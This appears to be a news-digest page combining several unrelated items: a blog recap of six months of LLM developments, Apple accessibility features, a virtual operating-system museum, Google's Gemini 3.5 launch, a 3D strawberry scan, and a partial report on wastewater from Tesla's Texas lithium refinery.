10 interesting stories served every morning and every evening.

The last six months in LLMs in five minutes

simonwillison.net

19th May 2026

I put to­gether these an­no­tated slides from my five minute light­ning talk at PyCon US 2026, us­ing the lat­est it­er­a­tion of my an­no­tated pre­sen­ta­tion tool.

#

I pre­sented this light­ning talk at PyCon US 2026, at­tempt­ing to sum­ma­rize the last six months of de­vel­op­ments in LLMs in five min­utes.

#

Six months is a pretty con­ve­nient time pe­riod to cover, be­cause it cap­tures what I’ve been call­ing the November 2025 in­flec­tion point. November was a crit­i­cal month in LLMs, es­pe­cially for cod­ing.

#

For one thing, the sup­pos­edly best” model (depending mostly on vibes) changed hands five times be­tween the three big providers.

#

As al­ways, I’m us­ing my Generate an SVG of a pel­i­can rid­ing a bi­cy­cle test to help il­lus­trate the dif­fer­ences be­tween the mod­els.

Why this test? Because pel­i­cans are hard to draw, bi­cy­cles are hard to draw, pel­i­cans can’t ride bi­cy­cles… and there’s zero chance any AI lab would train a model for such a ridicu­lous task.

#

At the start of November the widely ac­knowl­edged best” model was Claude Sonnet 4.5, re­leased on 29th September. It drew me this pel­i­can.

In November it was over­taken by GPT-5.1, then Gemini 3, then GPT-5.1 Codex Max, and then Anthropic took the crown back again with Claude Opus 4.5.

I think Gemini 3 drew the best pel­i­can out of this lot, but pel­i­cans aren’t every­thing. Most prac­ti­tion­ers will agree that Opus 4.5 held the crown for the next cou­ple of months.

#

It took a lit­tle while for this to be­come clear, but the real news from November was that the cod­ing agents got good.

OpenAI and Anthropic had spent most of 2025 run­ning Reinforcement Learning from Verifiable Rewards to in­crease the qual­ity of code writ­ten by their mod­els, es­pe­cially when paired up with their Codex and Claude Code agent har­nesses.

In November the re­sults of this work be­came ap­par­ent. Coding agents went from of­ten-work to mostly-work, cross­ing a qual­ity bar­rier where you could use them as a daily-dri­ver to get real work done, with­out need­ing to spend most of your time fix­ing their stu­pid mis­takes.

#

Also in November, this hap­pened—the first com­mit to an ob­scure (back then) repo called Warelay” by some guy called Pete.

#

Over the hol­i­day pe­riod, from December to January, a whole lot of us took ad­van­tage of the break to have a poke at these new mod­els and cod­ing agents and see what they could do.

They could do a lot! Some of us got a lit­tle bit over-ex­cited. I had my own short-lived bout of a form of LLM psy­chosis as I started spin­ning up wildly am­bi­tious pro­jects to see how far I could push them.

#

That play­ground demo shows JavaScript code run us­ing my mi­cro-javascript li­brary, in Python, run­ning in­side Pyodide, run­ning in WebAssembly, run­ning in JavaScript, run­ning in a browser!

It’s pretty cool! But did any­one out there need a buggy, slow, in­se­cure half-baked im­ple­men­ta­tion of JavaScript in Python?

They did not. I have quite a few other pro­jects from that hol­i­day pe­riod that I have since qui­etly re­tired!

#

On to February. Remember that Warelay pro­ject that had its first com­mit at the end of November?

#

In December and January it had gone through quite a few name changes… and by February it was tak­ing the world by storm un­der its fi­nal name, OpenClaw.

The amount of at­ten­tion it got is pretty as­ton­ish­ing for a pro­ject that was less than three months old.

#

OpenClaw is a personal AI as­sis­tant”, and we ac­tu­ally got a generic term for these, based on NanoClaw and ZeroClaw and such­like… they’re called Claws.

#

Mac Minis started to sell out around Silicon Valley, be­cause peo­ple were buy­ing them to run their Claws.

Drew Breunig joked to me that this is be­cause they’re the new dig­i­tal pets, and a Mac Mini is the per­fect aquar­ium for your Claw.

#

My favourite metaphor for Claws is Alfred Molina’s Doc Ock in the 2004 movie Spider-Man 2. His claws were pow­ered by AI, and were per­fectly safe pro­vided noth­ing dam­aged his in­hibitor chip… af­ter which they turned evil and took over.

#

Also in February: Gemini 3.1 Pro came out, and drew me a re­ally good pel­i­can rid­ing a bi­cy­cle. Look at this! It’s even got a fish in its bas­ket.

#

And then Google’s Jeff Dean tweeted this video of an an­i­mated pel­i­can rid­ing a bi­cy­cle, plus a frog on a penny-far­thing and a gi­raffe dri­ving a tiny car and an os­trich on roller skates and a tur­tle kick­flip­ping a skate­board and a dachs­hund dri­ving a stretch lim­ou­sine.

So maybe the AI labs have been pay­ing at­ten­tion af­ter all!

#

A lot of stuff hap­pened just in the past month.

#

Google re­leased the Gemma 4 se­ries of mod­els, which are the most ca­pa­ble open weight mod­els I’ve seen from a US com­pany.

#

Also last month, Chinese AI lab GLM came out with GLM-5.1—an open weight 1.5TB mon­ster! This is a very ef­fec­tive model… if you can af­ford the hard­ware to run it.

#

GLM-5.1 drew me this very com­pe­tent pel­i­can on a bi­cy­cle.

#

… though when it tried to an­i­mate it the bi­cy­cle bounced off into the top and the bi­cy­cle got warped.

#

Charles on Bluesky sug­gested I try it with a North Virginia Opossum on an E-scooter

#

And it did this! I’ve tried this on other mod­els and they don’t even come close. Cruising the com­mon­wealth since dusk” is per­fect. It’s an­i­mated too.

#

Here’s that Claude Sonnet 4.5 pel­i­can from September for com­par­i­son.

#

So those were the two main themes of the past six months. The cod­ing agents got re­ally good… and the lap­top-avail­able mod­els, while a lot weaker than the fron­tier, have started wildly out­per­form­ing ex­pec­ta­tions.

Apple unveils new accessibility features, and updates powered by Apple Intelligence

www.apple.com

Apple also an­nounced new fea­tures for con­trol­ling power wheel­chairs with Apple Vision Pro and gen­er­at­ing sub­ti­tles across the Apple ecosys­tem, all com­ing later this year

VoiceOver and Magnifier Can Explore More

A Mac screen dis­play­ing a source doc­u­ment with a com­plex lay­out and small text.

The Mac screen show­ing the doc­u­ment re­for­mat­ted by Accessibility Reader with larger, clearer text in a sin­gle col­umn.

Generated Subtitles for Video

Additional Updates

Vehicle Motion Cues come to vi­sionOS, which can help re­duce mo­tion sick­ness for peo­ple who use Apple Vision Pro as a pas­sen­ger in a mov­ing ve­hi­cle. Vision Pro will also sup­port face ges­tures for per­form­ing taps and sys­tem ac­tions, plus a new way to se­lect el­e­ments with one’s eyes while us­ing Dwell Control.

Touch Accommodations pro­vide a new way to per­son­al­ize setup in iOS and iPa­dOS.

Made for iPhone hear­ing aids pair and hand off be­tween Apple de­vices more re­li­ably, with an im­proved setup ex­pe­ri­ence in iOS, iPa­dOS, ma­cOS, and vi­sionOS.

Larger Text sup­port is com­ing to tvOS, so view­ers who have low vi­sion can in­crease on­screen text size to be eas­ier to read.

The Apple TV in­ter­face shows a menu for the show Prehistoric Planet: Ice Age” with the stan­dard text size.

The Apple TV in­ter­face shows a con­trol for in­creas­ing the text size.

The Apple TV in­ter­face shows a menu for the show Prehistoric Planet: Ice Age” with a larger text size.

Name Recognition, which can no­tify users who are deaf or hard of hear­ing if some­one says their name, works across more than 50 lan­guages glob­ally.

For sign lan­guage in­ter­pre­ta­tion app de­vel­op­ers, a new API sup­ports users in adding a hu­man in­ter­preter to an on­go­ing FaceTime video call.

Those with dif­fi­culty in­ter­act­ing with tra­di­tional con­trollers can now con­nect the Sony Access con­troller as a game con­troller with iOS, iPa­dOS, and ma­cOS. Users can con­fig­ure the thumb­stick, nine built-in but­tons, and up to four ad­di­tional ex­ter­nal but­tons or spe­cialty switches to per­son­al­ize lay­out. They can also com­bine two con­trollers for a deeply per­son­al­ized gam­ing ex­pe­ri­ence.

Text of this ar­ti­cle

Text of this ar­ti­cle

Media in this ar­ti­cle

Media in this ar­ti­cle

Apple Intelligence is avail­able in beta with sup­port for these lan­guages: English, Danish, Dutch, French, German, Italian, Norwegian, Portuguese, Spanish, Swedish, Turkish, Vietnamese, Chinese (simplified), Chinese (traditional), Japanese, and Korean. Some fea­tures may not be avail­able in all re­gions or lan­guages. For fea­ture and lan­guage avail­abil­ity and sys­tem re­quire­ments, see sup­port.ap­ple.com/​en-us/​121115.

VoiceOver and Magnifier should not be re­lied upon in cir­cum­stances where one could be harmed or in­jured, in high-risk sit­u­a­tions, for nav­i­ga­tion, or for the di­ag­no­sis or treat­ment of any med­ical con­di­tion.

Voice Control pow­ered by Apple Intelligence will be avail­able in English in the U.S., Canada, the UK, and Australia.

Generated sub­ti­tles will be avail­able in English in the U.S. and Canada.

The fea­ture and Apple Vision Pro are in­tended for use in con­trolled en­vi­ron­ments. For more in­for­ma­tion, visit sup­port.ap­ple.com/​en-us/​118507.

A wired con­nec­tion re­quires the pur­chase of the Apple Vision Pro Developer Strap.

Customers can pur­chase the Hikawa Grip & Stand for iPhone on ap­ple.com in Australia, Austria, Belgium, Canada, China, Denmark, France, Hong Kong, Italy, Japan, the Netherlands, Singapore, South Korea, Spain, Sweden, Switzerland, Taiwan, the United Arab Emirates, the UK, and the U.S.

The Virtual OS Museum

virtualosmuseum.org

This is a vir­tual mu­seum of op­er­at­ing sys­tems (and stand­alone ap­pli­ca­tions) run­ning un­der em­u­la­tion, im­ple­mented as a Linux VM for QEMU, VirtualBox, or UTM.

A cus­tom em­u­la­tor-in­de­pen­dent launcher is pro­vided, and all OSes and em­u­la­tors are pre-in­stalled and pre-con­fig­ured. The launcher in­cludes a snap­shot fea­ture to quickly re­vert bro­ken in­stal­la­tions back to a work­ing state. Hypervisor in­stallers and short­cuts to run the VM on Windows, ma­cOS, and Linux are also in­cluded.

Want to see the ear­li­est res­i­dent mon­i­tors? The an­ces­tor of all mod­ern OSes (CTSS)? The ear­li­est ver­sions of Unix? The first OS with a desk­top metaphor GUI (Xerox Star Pilot/ViewPoint)? Early ver­sions of main­stream OSes? If you want to ex­plore his­tor­i­cal OSes and plat­forms with­out hav­ing to worry about con­fig­ur­ing/​in­stalling em­u­la­tors and OSes or cor­rupt­ing em­u­lated in­stal­la­tions, you’ve come to the right place.

Just about every well-known OS and plat­form (and also a lot of ob­scure ones) is in­cluded in some form, span­ning the en­tire his­tory of stored-pro­gram com­put­ing from the Manchester Baby of 1948 (the first stored-pro­gram com­puter) to the pre­sent day.

The cat­a­logue cov­ers, among many other things:

The ear­li­est main­frames: Manchester Baby test/​demo pro­grams, Mark 1 Scheme A/B/C/T (the ear­li­est ex­am­ples of sys­tem soft­ware that could be con­sid­ered as an OS), var­i­ous EDSAC soft­ware, etc.

Later main­frames and mini­com­put­ers: CTSS, MVS, VM/370, TOPS-10/20, ITS, Multics, RSX, RSTS, and more

Workstations and Unix vari­ants: PERQ OSes, SunOS, IRIX, OSF/1, A/UX, NeXTSTEP, Plan 9, var­i­ous BSDs, plus Linux dis­tri­b­u­tions across the decades, and more

Home com­put­ers: var­i­ous CP/M vari­ants, Apple II, Commodore 8-bit ma­chines, Atari 8-bit, MSX, Tandy TRS-80, BBC Micro, ZX Spectrum, Sharp MZ, and more

Personal com­puter op­er­at­ing sys­tems: var­i­ous DOS vari­ants, OS/2, BeOS, Windows from 1.0 to early Longhorn be­tas, clas­sic Mac OS through Mac OS X 10.5 PPC, and more

Mobile and em­bed­ded: PalmOS, EPOC/Symbian, Windows CE, Newton OS, early Android and iOS where em­u­la­tion per­mits, QNX, etc.

Research and ob­scure sys­tems: ZetaLisp, Smalltalk en­vi­ron­ments, Oberon, Plan 9, and many more that few peo­ple now have ever booted

If a work­ing ver­sion of an op­er­at­ing sys­tem ex­ists some­where, the goal is to have it here, in a form any­one can run on a rea­son­ably mod­ern lap­top/​desk­top.

By the Numbers

1700+

in­stalls

250+

plat­forms

570+

dis­tinct oses

1948-now

era

Downloads

Both a full and a lite ver­sion are avail­able. The full ver­sion ships with every­thing pre-down­loaded and runs of­fline. The lite ver­sion down­loads disk/​tape/​etc. im­ages for guest VMs the first time they are run. Automatic and man­ual up­dates are sup­ported on both edi­tions so new in­stal­la­tions land with­out re-down­load­ing the whole VM.

Download the Virtual OS Museum

Screenshots

0. Launcher main win­dow

1. Launcher VM info

2. Unix PC SVR2 and XVM RSX

AFROS (XaAES) 8.12 – 00 TeraDesk

AO-DOS 2.10 – 00 Intro

ATT Unix PC System V R2 3.51m - 00 File Manager and Terminal

A_UX 3.1.1 – 00 Finder with util­i­ties

Amiga UNIX (AMIX) 2.1c - 00 OpenLook desk­top with ap­pli­ca­tions

CP_M for PSI98 2.2 (6.31-Z) - 00 DIR

CSIDOS 3.32 – 00 Intro

Coherent 4.2.14 – 00 olwm with ap­pli­ca­tions

Domain_OS SR10.4 – 01 VUE desk­top

E_OS LX 0.2.5 – 00 Terminal

FlexOS 2.3 (COROS LS-B 4.01) - 03 About

GNO_ME 2.0.6 – 01 TMTerm

HP-UX 11i v1 (B.11.11) - 00 CDE with util­i­ties

Human68K 3.02 – 00 LHES

IBM 1130 DMS V2M12 - 00 LET list­ing

IBM OS_2 (Extended Edition) 1.1 – 00 Desktop Manager

IRIX 6.5.22m - 00 IMD with ap­pli­ca­tions

Inferno Fourth Edition (20100115) - 00 GUI with ap­pli­ca­tions

LisaOS 3.1 – 02 LisaDraw

MOS for BBC Master Compact 5.10 (Base) - 02 Desktop

Mac OS (Classic) 1.0 al­pha; Sony Test (System 7.0’, Finder 1983 – 10-04) - 00 Finder

Mac OS 9.0.4 – 00 Finder, Internet Explorer,and Help

Mach386 2.6 1.0 (X108_MSD) - 00 X11 with ap­pli­ca­tions

Minerva 1.98 (QL_E (shares disk im­ages with SMSQ_E QL_E)) - 00 Desktop with ap­pli­ca­tions

Minix 3.4.0rc6 – 00 X11 Terminal and Links

NeXTStep (68k) 3.3 – 00 Desktop with ap­pli­ca­tions

OS-9_x86 (a.k.a. OS-9000_x86) 6.1 – 00 XiBase

PSI-OS 12.2 – 00 Start

Plan 9 4th Edition - 01 acme filesys­tem server

QNX 1.2 – 00 boot

RISC OS 3.11 (Minimal (Old boot)) - 00 Desktop with ap­pli­ca­tions

SILLIAC soft­ware col­lec­tion - 00 Blob demo

SINIX (PC-X) 1.2 – 01 Login Prompt

SX-WINDOW 3.1 – 00 Desktop

Sharp Personal CP_M for MZ-2500 (MZ-6Z001) 1.0a - 00 VCCP

Softlanding Linux System 1.0 – 00 ls un­ame and ker­nel source

Solaris_SPARC 9 (s9_58shwpl3) - 00 CDE ter­mi­nal help and file man­ager

Syllable 0.5.2 – 00 Desktop with ap­pli­ca­tions

SymbOS 1.0 Beta - 01 About

Tru64 UNIX 5.1B - 00 CDE with util­i­ties

ULTRIX_VAX 4.0 – 00 DECwindows with ap­pli­ca­tions

UNICOS 10.0.0.2 – 01 X11 with util­i­ties

More screen­shots

Why this ex­ists

While the state of soft­ware preser­va­tion has im­proved sig­nif­i­cantly over the past two decades, many of the ex­ist­ing soft­ware preser­va­tion pro­jects are still not par­tic­u­larly ac­ces­si­ble.

When I started col­lect­ing em­u­la­tor im­ages (2003), there were only a few small archives of soft­ware im­ages and the cor­re­spond­ing doc­u­men­ta­tion, and rel­a­tively few em­u­la­tors for any­thing other than well-known con­sumer-ori­ented plat­forms. Nowadays there are many large archives of his­tor­i­cal soft­ware and doc­u­men­ta­tion, and a lot of em­u­la­tors for even a lot of very ob­scure plat­forms.

However, while such ef­forts are valu­able when it comes to keep­ing his­tor­i­cal soft­ware avail­able and runnable (and with­out them this pro­ject would have never been pos­si­ble; see the cred­its page for a list of em­u­la­tors, pre-in­stalled im­ages, and me­dia archives I have used), it of­ten still takes time and ef­fort to get runnable VM in­stal­la­tions from them. OSes may have com­pli­cated in­stall pro­ce­dures. Some may de­pend on par­tic­u­lar de­vice con­fig­u­ra­tions within an em­u­la­tor. Some will only run in cer­tain em­u­la­tor ver­sions, break­ing in later ones due to re­gres­sions. Some em­u­la­tors might have com­plex con­fig­u­ra­tion files, or may re­quire a spe­cific en­vi­ron­ment on the host sys­tem.

This pro­ject is an at­tempt to keep reach­able as much of the his­tory that’s been pre­served in var­i­ous places as pos­si­ble. Not the­o­ret­i­cally reach­able. Not bootable in prin­ci­ple if you as­sem­ble the right tool­chain on a Tuesday.” Reachable. You click an en­try, it runs, and where pos­si­ble it runs with soft­ware of the era al­ready loaded the way some­one might ac­tu­ally have used the ma­chine at the time.

The work be­hind it

This is the re­sult of over 20 years of col­lect­ing. OS in­stal­la­tions have been sourced from var­i­ous places. Some have been down­loaded as pre-in­stalled im­ages, whereas oth­ers were in­stalled from im­ages of orig­i­nal in­stall me­dia. Some were in­stalled in less than an hour, whereas oth­ers took al­most a week.

A de­cent num­ber only run in par­tic­u­lar em­u­la­tor ver­sions due to re­gres­sions in later ver­sions, and some em­u­la­tors needed mi­nor patches to run on mod­ern Linux or to play nice with the launcher. A few em­u­la­tors have been patched to run OSes that were pre­vi­ously bro­ken.

Many in­stal­la­tions also in­clude var­i­ous add-on soft­ware - ap­pli­ca­tions, de­vel­op­ment tools, games, util­i­ties, etc. - set up the way it ac­tu­ally might have been used.

This is still far from fin­ished; I have many more im­ages sit­ting around that I have yet to in­stall and em­u­la­tors I want to fix; check out my YouTube chan­nel, blog, or BlueSky to see what I’m cur­rently work­ing on.

Support the pro­ject

This is a per­sonal pro­ject, run and cu­rated by one per­son, sus­tained by pa­tience and time. If you find it in­ter­est­ing, the eas­i­est ways to sup­port it are:

Patreon for on­go­ing sup­port

Ko-fi for one-off con­tri­bu­tions

Discord/Fluxer to talk about it, ask ques­tions, or sug­gest new plat­forms/​OSes to add (new en­tries may not be added im­me­di­ately since I’ve got a lot of stuff to add)

GitLab to sub­mit bug re­ports or patches re­lated to the launcher and scripts

Telling some­one who works on, writes about, or stud­ies the his­tory of com­put­ing that this ex­ists

Gemini 3.5: frontier intelligence with action

blog.google

May 19, 2026

Gemini 3.5 is built to help you ex­e­cute com­plex, agen­tic work­flows.

In this story

Gemini 3.5 Flash

Frontier in­tel­li­gence, ex­cep­tional speed

Agentic tasks at scale

Richer graph­ics

Real-world im­pact

Personal AI agents

Built with Frontier safe­guards

Available to­day

Your browser does not sup­port the au­dio el­e­ment.

Listen to ar­ti­cle

This con­tent is gen­er­ated by Google AI. Generative AI is ex­per­i­men­tal

[[duration]] min­utes

Today, we’re in­tro­duc­ing Gemini 3.5, our lat­est fam­ily of mod­els com­bin­ing fron­tier in­tel­li­gence with ac­tion. This rep­re­sents a ma­jor leap for­ward in build­ing more ca­pa­ble, in­tel­li­gent agents. We’re kick­ing off the se­ries by re­leas­ing 3.5 Flash. It de­liv­ers fron­tier per­for­mance for agents and cod­ing, ex­celling at com­plex long-hori­zon tasks that de­liver real-world util­ity.

3.5 Flash is avail­able to­day to bil­lions of peo­ple glob­ally:

For every­one via the Gemini app and AI Mode in Google Search

For de­vel­op­ers in our agent-first de­vel­op­ment plat­form Google Antigravity and Gemini API in Google AI Studio and Android Studio

For en­ter­prises in Gemini Enterprise Agent Platform and Gemini Enterprise.

We’re also hard at work on 3.5 Pro. It’s al­ready be­ing used in­ter­nally, and we look for­ward to rolling it out next month.

3.5 Flash: fron­tier per­for­mance for agents and cod­ing

Gemini 3.5 Flash de­liv­ers in­tel­li­gence that ri­vals large flag­ship mod­els on mul­ti­ple di­men­sions, at the speeds you have come to ex­pect from the Flash se­ries. It’s our strongest agen­tic and cod­ing model yet, out­per­form­ing Gemini 3.1 Pro on chal­leng­ing cod­ing and agen­tic bench­marks like Terminal-Bench 2.1 (76.2%), GDPval-AA (1656 Elo) and MCP Atlas (83.6%), and lead­ing in mul­ti­modal un­der­stand­ing (84.2% on CharXiv Reasoning). When look­ing at out­put to­kens per sec­ond, it is 4 times faster than other fron­tier mod­els.

Landing in the top-right quad­rant of the Artificial Analysis in­dex, 3.5 Flash de­liv­ers fron­tier-level in­tel­li­gence at ex­cep­tional speed — prov­ing you no longer have to trade qual­ity for la­tency.

3.5 Flash: agen­tic tasks at scale

This bal­ance of speed and per­for­mance makes 3.5 Flash ideal for tack­ling long-hori­zon agen­tic tasks. What used to take a de­vel­oper days or an au­di­tor weeks, 3.5 Flash can now help com­plete in a frac­tion of the time, of­ten at less than half the cost of other fron­tier mod­els. It rapidly plans, builds and it­er­ates to solve real-world prob­lems, whether it’s de­vel­op­ing new ap­pli­ca­tions, main­tain­ing code­bases or help­ing to pre­pare fi­nan­cial doc­u­ments.

When cou­pled with the up­dated Antigravity har­ness, 3.5 Flash be­comes a pow­er­ful en­gine for de­ploy­ing col­lab­o­ra­tive sub­agents to tackle prob­lems at scale for the most de­mand­ing use cases. Under su­per­vi­sion, it can re­li­ably ex­e­cute multi-step work­flows and cod­ing tasks while sus­tain­ing fron­tier per­for­mance.

Powered by Antigravity, 3.5 Flash ex­e­cutes multi-step work­flows to au­to­mat­i­cally re­name and cat­e­go­rize un­struc­tured as­sets based on dy­namic cri­te­ria.

Leveraging Antigravity, 3.5 Flash uses two agents to syn­the­size the AlphaZero pa­per and code a fully playable game in six hours.

3.5 Flash uses the Antigravity har­ness to trans­form a messy legacy code­base to Next.js.

3.5 Flash uses sub­agents to cre­ate new city land­scapes in Antigravity.

3.5 Flash uses two agents: a builder and a player, work­ing in a rapid self-im­prove­ment loop to de­velop a game in Antigravity.

Building on the strong mul­ti­modal foun­da­tion of Gemini 3, 3.5 Flash gen­er­ates richer, more in­ter­ac­tive web UIs and graph­ics.

3.5 Flash cre­ates in­ter­ac­tive an­i­ma­tions for a re­search pa­per on AI Studio.

3.5 Flash turns a plain text de­scrip­tion into in­ter­ac­tive hard­ware on AI Studio.

3.5 Flash ex­e­cutes mul­ti­ple con­cepts in par­al­lel to build a full brand­ing con­cept for a school fundraiser on AI Studio.

3.5 Flash gen­er­ates dif­fer­ent UX ap­proaches for a check­out flow in just 60 sec­onds on AI Studio.

3.5 Flash: real-world im­pact

3.5 Flash’s real-world agen­tic ca­pa­bil­i­ties are al­ready dri­ving mean­ing­ful progress for our de­vel­op­ers and en­ter­prises alike. In de­vel­op­ing the 3.5 model se­ries, we worked closely with in­dus­try part­ners to un­der­stand where toil and com­plex­ity arose in their work­flows. Partners are see­ing mean­ing­ful im­pact — from banks and fin­techs au­tomat­ing multi-week work­flows to data sci­ence teams un­earthing in­sights amidst com­plex data en­vi­ron­ments.

Shopify is run­ning sub­agents in par­al­lel to an­a­lyze com­plex data over a long hori­zon for more ac­cu­rate mer­chant growth fore­casts at a global scale.

Macquarie Bank is pi­lot­ing how 3.5 Flash can ac­cel­er­ate cus­tomer on­board­ing by rea­son­ing over com­plex 100+ page doc­u­ments, re­triev­ing rel­e­vant in­for­ma­tion and mak­ing re­li­able rec­om­men­da­tions with low la­tency.

Salesforce is in­te­grat­ing 3.5 Flash into Agentforce to re­li­ably au­to­mate com­pli­cated en­ter­prise tasks by de­ploy­ing mul­ti­ple sub­agents that re­tain con­text and ex­e­cute com­plex, multi-turn tool call­ing.

3.5 Flash is help­ing Ramp en­able smarter, more re­li­able OCR through mul­ti­modal un­der­stand­ing of com­plex in­voices com­bined with rea­son­ing over his­tor­i­cal pat­terns.

Xero is de­ploy­ing agents to au­tonomously man­age com­plex, multi-week work­flows, such as iden­ti­fy­ing sup­pli­ers and gath­er­ing in­for­ma­tion for 1099 tax forms, en­abling small busi­nesses to au­to­mate te­dious ad­min tasks.

Databricks is us­ing agen­tic work­flows to mon­i­tor and re­trieve real-time in­for­ma­tion, rea­son across mas­sive datasets to di­ag­nose is­sues, iden­tify fixes and pro­pose so­lu­tions for data sci­en­tists.

Personal AI agents: built with 3.5 Flash

3.5 Flash is now the de­fault model for the Gemini app and AI Mode in Search glob­ally. At I/O to­day, we showed how its agen­tic ca­pa­bil­i­ties are pow­er­ing new fea­tures to bring fron­tier-level in­tel­li­gence to your daily life.

The new Gemini Spark, your per­sonal AI agent, uses 3.5 Flash. It runs 24/7, help­ing you nav­i­gate your dig­i­tal life, tak­ing ac­tion on your be­half while un­der your di­rec­tion. We’re start­ing to roll out Gemini Spark to trusted testers to­day, and we’re plan­ning on bring­ing the Beta to Google AI Ultra sub­scribers in the US next week.

Gemini Spark uses 3.5 Flash to help ac­com­plish these tasks

Gemini Spark uses 3.5 Flash to help ac­com­plish these tasks

Gemini Spark uses 3.5 Flash to help ac­com­plish these tasks

Gemini Spark uses 3.5 Flash to help ac­com­plish these tasks

Gemini Spark uses 3.5 Flash to help ac­com­plish these tasks

The en­hanced agen­tic cod­ing ca­pa­bil­i­ties of 3.5 Flash are also de­liv­er­ing even more in­tel­li­gent ex­pe­ri­ences across Search, from in­tro­duc­ing new in­for­ma­tion agents that work for you 24/7 to un­lock­ing more dy­namic gen­er­a­tive UI ex­pe­ri­ences. Learn more in our blog post.

Search lever­ages 3.5 Flash to build an in­ter­ac­tive vi­sual ex­plain­ing Gyroid pat­terns.

Gemini 3.5: built with fron­tier safe­guards

Gemini 3.5 was de­vel­oped in ac­cor­dance with our Frontier Safety Framework. We have strength­ened our cy­ber and CBRN safe­guards, which means it’s less likely to gen­er­ate harm­ful con­tent, and to mis­tak­enly refuse to an­swer safe queries. We achieve this with new, more ad­vanced safety train­ing and mit­i­ga­tions, in­clud­ing in­ter­pretabil­ity tools that help check and un­der­stand the AIs in­ner rea­son­ing be­fore it pro­vides a re­sponse.

3.5 Flash is avail­able to­day

Gemini 3.5 Flash is gen­er­ally avail­able via Google Antigravity, the Gemini API in Google AI Studio and Android Studio, Gemini Enterprise Agent Platform and Gemini Enterprise. It’s also now avail­able to every­one in the Gemini app and AI Mode in Search. On be­half of the en­tire Gemini team, we can’t wait to see what you build.

Get more sto­ries from Google in your in­box.

Done. Just one step more.

Check your in­box to con­firm your sub­scrip­tion.

You are al­ready sub­scribed to our newslet­ter.

You can also sub­scribe with a

Strawberry

superspl.at

Shot from 90 per­spec­tives, 88 fo­cus stacked im­ages each. Nikon Z8, full frame, f/​7.1, ex­po­sure 1/160, ISO 100, Laowa 180mm macro lens, with LED light and blue­screen.

Training was done in slang-splat: https://​github.com/​Michael­Moroz/​slang-splat

You can down­load it un­der CC BY li­cense, but at­tri­bu­tion is ap­pre­ci­ated rather than re­quired. You may use this work with­out at­tri­bu­tion.

The COLMAP dataset is also avail­able (free) on my Patreon.

www.pa­treon.com/​Dany­Bit­tel

A Texas Drainage District Walked Its Ditch on a Routine Inspection. They Found a Pipe They Didn't Recognize Discharging Black Liquid From Tesla's $1 Billion Lithium Refinery

www.autonocion.com

Drainage dis­trict work­ers in Nueces County, Texas, were do­ing rou­tine main­te­nance on a ditch out­side Robstown in January 2026 when they no­ticed some­thing they had not seen be­fore. A pipe they did not rec­og­nize, stretched across an ease­ment they over­see, was dis­charg­ing dark liq­uid into the ditch they man­age. Very dark and murky,” is how Steve Ray, a con­sul­tant for the drainage dis­trict, de­scribed it to KRIS 6 News. I would say it was ac­tu­ally black. We’re used to see­ing good run­ning wa­ter, and so we did­n’t know ex­actly what it was.”

The pipe be­longed to Tesla. The dark liq­uid was waste­water from the com­pa­ny’s nearly $1 bil­lion lithium re­fin­ery, which be­gan op­er­a­tions in December 2024 and was, at the time, the first com­mer­cial-scale spo­dumene-to-lithium-hy­drox­ide re­fin­ery in North America. Tesla had mar­keted the plant for years as an acid-free clean process,” promis­ing sand and lime­stone as the main byprod­ucts. The drainage dis­trict had not been told that 231,000 gal­lons of treated waste­water per day would be flow­ing through its in­fra­struc­ture.

What hap­pened next, across the four months that fol­lowed, is one of the more un­com­fort­able sto­ry­lines in the American elec­tric ve­hi­cle sup­ply chain right now, and al­most no main­stream US au­to­mo­tive press has touched it.

How the drainage dis­trict found out about the pipe

The Texas Commission on Environmental Quality, the state en­vi­ron­men­tal reg­u­la­tor known as TCEQ, had qui­etly is­sued Tesla a waste­water dis­charge per­mit on January 15, 2025. The per­mit, a Texas Pollutant Discharge Elimination System au­tho­riza­tion known as TPDES, al­lowed up to 231,000 gal­lons of treated waste­water per day to be dis­charged into an un­named ditch that flows into Petronila Creek and from there into Baffin Bay, a long­time South Texas salt­wa­ter fish­ing des­ti­na­tion.

What it did not do, ex­plic­itly, was grant Tesla the right to use pub­lic or pri­vate prop­erty for waste­water con­veyance. The drainage dis­trict that man­ages the ditch the pipe was dis­charg­ing into was never no­ti­fied that the per­mit ex­isted. Its work­ers found out the way drainage dis­trict work­ers in any small Texas county find out about things: by walk­ing the ditch and see­ing some­thing new.

Join the con­ver­sa­tion · The Lot

50 own­ers shar­ing real ex­pe­ri­ences

They filed two com­plaints with TCEQ in January and February 2026. A state in­ves­ti­ga­tor vis­ited on February 12, sam­pled the wa­ter flow­ing from Tesla’s out­fall pipe, ran the stan­dard panel of con­ven­tional pol­lu­tants: dis­solved solids, chlo­rides, sul­fates, oil and grease, tem­per­a­ture, dis­solved oxy­gen. Everything in that panel came back in­side the bounds of Tesla’s per­mit. TCEQ ap­proved its in­ves­ti­ga­tion re­port on March 20, find­ing no per­mit vi­o­la­tion.

TCEQ did not test for heavy met­als. Aref Mazloum, a vol­un­teer en­gi­neer con­sult­ing for the drainage dis­trict who has also re­cently joined TCEQs wa­ter sup­ply di­vi­sion, later ex­plained to the Houston Chronicle that heavy met­als were not tested be­cause they had not been part of the orig­i­nal com­plaint the dis­trict filed. The per­mit also did not re­quire any mon­i­tor­ing of lithium it­self, which, as the Texas Tribune later noted, is the pri­mary ma­te­r­ial the fa­cil­ity was built to process.

What the drainage dis­tric­t’s lab ac­tu­ally found

By the time TCEQ closed its in­ves­ti­ga­tion, the drainage dis­trict had al­ready hired its own at­tor­ney and com­mis­sioned its own in­de­pen­dent test. Frank Lazarte, an at­tor­ney rep­re­sent­ing Nueces County Drainage District No. 2, con­tracted Eurofins Environment Testing, an in­ter­na­tion­ally ac­cred­ited en­vi­ron­men­tal lab with a San Antonio fa­cil­ity, to put a sam­pling ma­chine in the ditch for 24 hours and an­a­lyze what it caught. The un­named drainage ditch sits less than a mile up­stream of Tesla’s dis­charge pipe.

The sam­ple was col­lected on April 7. Eurofins is­sued its re­sults on April 10. According to the lab re­port, the 24-hour com­pos­ite found:

Hexavalent chromium at 0.0104 mil­ligrams per liter, just above the lab’s re­port­ing limit of 0.01 mg/​L. Hexavalent chromium is clas­si­fied as a known hu­man car­cino­gen by the US National Toxicology Program. It is the sub­stance the Erin Brockovich case was built around.

Arsenic at 0.0025 mg/​L. That is be­low the fed­eral drink­ing wa­ter stan­dard of 0.01 mg/​L, but pre­sent.

Strontium at 1.17 mg/​L. Mazloum’s tech­ni­cal re­port on the find­ings noted that long-term ex­po­sure can af­fect bone den­sity and kid­ney func­tion in hu­mans and wildlife.

